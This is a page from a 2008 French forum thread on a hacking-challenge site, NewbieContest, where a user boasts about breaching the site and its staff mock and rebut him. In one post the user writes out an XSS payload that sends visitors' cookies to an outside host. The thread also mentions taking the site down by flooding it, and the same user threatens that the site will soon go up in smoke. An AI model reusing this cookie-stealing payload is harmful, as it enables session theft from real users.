logo Homepage
+  NewbieContest
|-+  Général» Defouloir» [perl] problème de cookie
Username:
Password:
Pages: 1 [2] 3
  Imprimer  
Auteur Fil de discussion: [perl] problème de cookie  (Lu 18416 fois)
the lsd
Administrateur

Profil challenge

Classement : 181/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3096

poulping for fun & profit


Voir le profil WWW
« #15 le: 20 Mai 2008 à 16:05:31 »

simple question les filles quand aller vous arrêtez de repenser a la faille que j'avais trouver sur votre site(XSS) j'aurais pue reprendre tous vos cookie pourtant je l'ai pas fait ! (60 lignes de code source sur le site est deux failles sa fait un peut pitié)  vous étés même fait pirater votre compte free bande de noob ^^
ou encore le crash quand vous étiez sur newbiecontest.none.org
sinon j'adore la vidéo bbbb que mon pote à fait ça fait bien 4 ans qu'elle a été crée et elle est toujours là donc ça prouve que vous râlez toujours !!   

bon mon petit _o_ avec ta tête de mongole, si je veux coder en perl et pas en C l'exploit que j'ai trouvé sur forum ça te regarde pas !

XD La bonne blague

Bon alors rectifions : : bon le XSS je passe, je ne suis pas au courant

Le compte free, et bien non, ce n'est pas inhérent à NC mais a free qui devrait un peu se bouger les fesses sur leurs serveurs... donc ca on vire.

Le crash de NC à l'époque de n0ne, si on parle du même (le site qui n'était plus dispo pendant une bonne semaine, voire plus) n'est pas un problème du aux admins de NC, mais a Febrez, qui n'était pas dispo à cette époque (d'après ce que j'en sais), ca on vire aussi.

La video de bbbb ne date pas d'il y a 4 ans, mais de 1 tout au plus (oui, il y a 4 ans, NC devait peut etre bien encore être sur un compte free...) Ca on peut donc virer aussi.

Enfin, je doute grandement que tu aie trouvé un exploit sur le forum de NC parce que ce message d'erreur (vous n'etes pas loggué) se trouve sur les épreuves de prog, on vire donc aussi.

Donc en calculant (toujours en virant le XSS), il ne reste à peu près... rien

Voili voilou c'etait juste pour mettre un peu les choses au clair

Enjoy

The lsd

Edit
Le reste, ça n'en vaut même pas le coup.

voila moi je l'ai fait
« Dernière édition: 20 Mai 2008 à 16:08:01 par the lsd » Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
Folcan

Profil challenge

Classement : 509/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1520


Voir le profil
« #16 le: 20 Mai 2008 à 16:54:44 »

Citation
Le crash de NC à l'époque de n0ne, si on parle du même (le site qui n'était plus dispo pendant une bonne semaine, voire plus) n'est pas un problème du aux admins de NC, mais a Febrez, qui n'était pas dispo à cette époque (d'après ce que j'en sais), ca on vire aussi.

Effectivement, l'alim du serveur était partie en rade, et Febrez en vacances, donc je vois pas le rapport avec les admins de NC... m'enfin bon...

Citation
La video de bbbb ne date pas d'il y a 4 ans, mais de 1 tout au plus (oui, il y a 4 ans, NC devait peut etre bien encore être sur un compte free...) Ca on peut donc virer aussi.

Exacte, il y'a 4 ans, NC était sur le serveur de CyberSee, et n'avait absolument pas cette tronche la.
La vidéo ? Je dirais même moins d'un an...
Et la plus part du temps ou elle est ressortie, c'est quand même surtout pour se foutre de la tronche de bbbb 

Mais sinon, c'est simpa de faire des topics à troll 
Journalisée

-=[FoLc@N]=-

Citation :
* Le futur appartient à ceux qui croient à la beauté de leurs rêves, je crois au miens, NewbieContest aura un bon futur.
* Il y'a seulement 10 categories de gens dans la vie : ceux qui comprennent le binaire, et les autres.
zours

Profil challenge

Classement : 555/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #17 le: 20 Mai 2008 à 17:06:31 »

Et la plus part du temps ou elle est ressortie, c'est quand même surtout pour se foutre de la tronche de bbbb 

Rien de plus distrayant que de se foutre d'un gros nul qui sait à peine lire un sploit . Ah non pardon, c'est pas lui c'est un ami.
Journalisée
_o_
Relecteur

Profil challenge

Classement : 43/54670

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #18 le: 20 Mai 2008 à 17:52:32 »

j'aurais pue reprendre tous vos cookie pourtant je l'ai pas fait !

Parce que tu ne le pouvais pas, à la fois techniquement et intellectuellement. Allons, soyons sérieux, met tes c** sur la table et prouve nous que tu es sérieux : viens piquer mon cookie.

Citation
vous étés même fait pirater votre compte free bande de noob ^^

Bah, puisque tu es si fort, tu vas mettre à jour toi-même la version de php sur les serveurs de free, alors ?

Citation
ou encore le crash quand vous étiez sur newbiecontest.none.org

Huhu. Je ne vais pas relancer cette histoire, mais ceux qui connaissent les circonstances en rigolent encore, mais pas pour les raisons que tu penses.¹

Citation
sinon j'adore la vidéo bbbb que mon pote à fait ça fait bien 4 ans qu'elle a été crée et elle est toujours là donc ça prouve que vous râlez toujours !!

Tu parles de ce fichier http://lordoric.free.fr/vrac/bbbb.swf là ? Ahah. «C'était pas moi !». Ben voyons. La date de création de cette... vidéo est très simple à estimer. Un peu plus d'un an. Pile poil. Les moins observateurs pourront facilement s'en rendre compte. Mais sauras-tu, toi, trouver comment ?

Citation
bon mon petit _o_ avec ta tête de mongole,


Hihi, j'adore cet avatar...

Citation
si je veux coder en perl et pas en C l'exploit que j'ai trouvé sur forum ça te regarde pas !

Ouais. En attendant, le n4><or perpétuel de NC depuis un an peine à lancer une requête HTTP avec cookie en perl. Et il va nous faire croire qu'il peut piquer ceux des autres sur le serveur ? Tu sombres dans un ridicule tragique, mais je dois avouer que ton sens comique est épatant.

¹: tiens, je ne parle pas du même épisode que the_lsd et Folcan, mais ce n'est pas grave.
« Dernière édition: 20 Mai 2008 à 17:55:20 par _o_ » Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
the lsd
Administrateur

Profil challenge

Classement : 181/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3096

poulping for fun & profit


Voir le profil WWW
« #19 le: 20 Mai 2008 à 18:00:48 »

¹: tiens, je ne parle pas du même épisode que the_lsd et Folcan, mais ce n'est pas grave.

On remarque le 1

J'ai pensé a cet épisode aussi (si on parle du même), mais encore une fois, ce n'est pas la faute de Soso/Zours, ni même du code de Newbie Contest

Enjoy

The lsd
Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
Zmx

Profil challenge

Classement : 73/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 559


Voir le profil WWW
« #20 le: 20 Mai 2008 à 18:01:59 »

¹: tiens, je ne parle pas du même épisode que the_lsd et Folcan, mais ce n'est pas grave.
Moi aussi je parle de celle ci (enfin non j'en parle pas, mais je rigole)
Journalisée

the lsd
Administrateur

Profil challenge

Classement : 181/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3096

poulping for fun & profit


Voir le profil WWW
« #21 le: 20 Mai 2008 à 18:10:30 »

Ahhh je susi décu de devoir partir du boulot et quitter le monde du oueb, dommage, ce topic était pourtant très instructifs. Si **No Sms** pouviez attendre demain après midi avant de fermer le topic, que je puisse encore m'amuser un peu

Enjoy

The lsd
Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
Id2RuE
Profil challenge

Classement : 11982/54670

Néophyte
*
Hors ligne Hors ligne
Messages: 9


Voir le profil
« #22 le: 20 Mai 2008 à 18:10:47 »

on dirait que vous le faite exprès, d'abord la faille xss était dans l'inscription dans Punbb on pouvait taper par exemple:
Code:
pseudo:'><script>document.location('http://site.ifrance.com/cookie.php?c='+document.cookie);</script><'

est ensuite on pouvait se connecter sur le site, bien sûr la version punbb est protégé contre les caractères spéciaux mais le site n'avait aucune protection, comme normalement il devait pas y avoir de code javascript ou HTML... (il y a 10 personnes qui était avec moi sur le teamspeak quand je leurs ai montré il était mort de rire) formulaire inscription a été arrêter pendant une nuit a cause de ça

donc arrêter de mitonner !

ensuite le crash, on avait juste flood pendant 1 minute le site et il n'a plus répondu  pendant 2 heures (http://newbiecontest.none.org)

donc arrêter de vous voiler la fasse bande de moche tous ceux que j'ai rencontrer vous prennent pour des cons !!

ensuite je ne parlai pas de se forum même si maintenant j'ai encore envie de vous donner bonne leçon de securite informatique !

et si la vidéo bbbb a été crée il y a trois ans ! et oui le temps passe vite mais vous ne changer pas 

SO410 le truc qui parle beaucoup connait pas grand chose tu sais qu'on peut modifier maxlength en local ...noob
« Dernière édition: 20 Mai 2008 à 18:15:15 par Id2RuE » Journalisée
Id2RuE
Profil challenge

Classement : 11982/54670

Néophyte
*
Hors ligne Hors ligne
Messages: 9


Voir le profil
« #23 le: 20 Mai 2008 à 18:19:46 »

vous trouvé pas ça bizarre que tous les administrateurs, modo, ... sont tous sur le forum pour proteger la fierté de la team newbiecontest ?
Journalisée
zours

Profil challenge

Classement : 555/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #24 le: 20 Mai 2008 à 18:22:48 »

Y'a un spectacle comique, on va pas rater ça XD.
Journalisée
Id2RuE
Profil challenge

Classement : 11982/54670

Néophyte
*
Hors ligne Hors ligne
Messages: 9


Voir le profil
« #25 le: 20 Mai 2008 à 18:25:37 »

je préféré plus rien dire parce que je suis tout seul contre 6 à 7 cons donc connecte toi SSH mon vieux parce que ton site il va partir en fumer bientôt !
Journalisée
Zmx

Profil challenge

Classement : 73/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 559


Voir le profil WWW
« #26 le: 20 Mai 2008 à 18:26:29 »

et si la vidéo bbbb a été crée il y a trois ans ! et oui le temps passe vite mais vous ne changer pas 

Sur la video on peut voir que la derniere epreuve c'est :Crypto - On pourrait y aller à ski de 7 à 8, non ?
Cette Crypto date de le: 22 Février 2007 à 21:50:44
Nous sommes en Mai 2008, ouais ça fait 3 ans, pas de soucis, je comprend ton probleme de perl maintenant ...
Journalisée

S0410N3
Administrateur

Profil challenge

Classement : 10/54670

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1260


Voir le profil WWW
« #27 le: 20 Mai 2008 à 18:29:56 »

1 - Il n'y a pas de team newbiecontest, NC c'est un site de challenges, rien d'autre.
2 - Ah ouais modifier un maxlength local ça te permet de bypasser une regexp côté serveur... C'est beau.
3 - T'as beau être comique, à la longue, moi tu me fatigues Sur ce, je laisse la place aux autres si ils veulent continuer à s'amuser. J'ai mieux à faire.
Journalisée

Enjoy (copyleft de quelqu'un qui a trop parlé)

S0410N3

-------------------------------------------------------------------------------------
La folie est le prix à payer pour le temps passé à être trop lucide.
-------------------------------------------------------------------------------------
http://forum.hardware.fr/hfr/Discussions/Societe/francais-repere-repaire-sujet_19265_1.htm
_o_
Relecteur

Profil challenge

Classement : 43/54670

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #28 le: 20 Mai 2008 à 18:30:26 »

bon le XSS je passe, je ne suis pas au courant

Y'a qu'à demander !
http://lordoric.free.fr/vrac/HACKED%20BY%20uSer_Ghost.html

Citation
bande de moche

Fear !

Citation
tous ceux que j'ai rencontrer vous prennent pour des cons !!

Et réciproquement. Qui se ressemble s'assemble. Ah, quelqu'un me demande s'ils ont tous la même voix que toi ?

Citation
et si la vidéo bbbb a été crée il y a trois ans !

(http://lordoric.free.fr/vrac/bbbb_zoom.jpg)
Tocard, va.
Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
Mr_KaLiMaN
Relecteur

Profil challenge

Classement : 64/54670

Membre Senior
*
Hors ligne Hors ligne
Messages: 426


Voir le profil WWW
« #29 le: 20 Mai 2008 à 18:31:10 »

ça veut dire quoi SSH ?
Journalisée
Pages: 1 [2] 3
  Imprimer  
 
Aller à: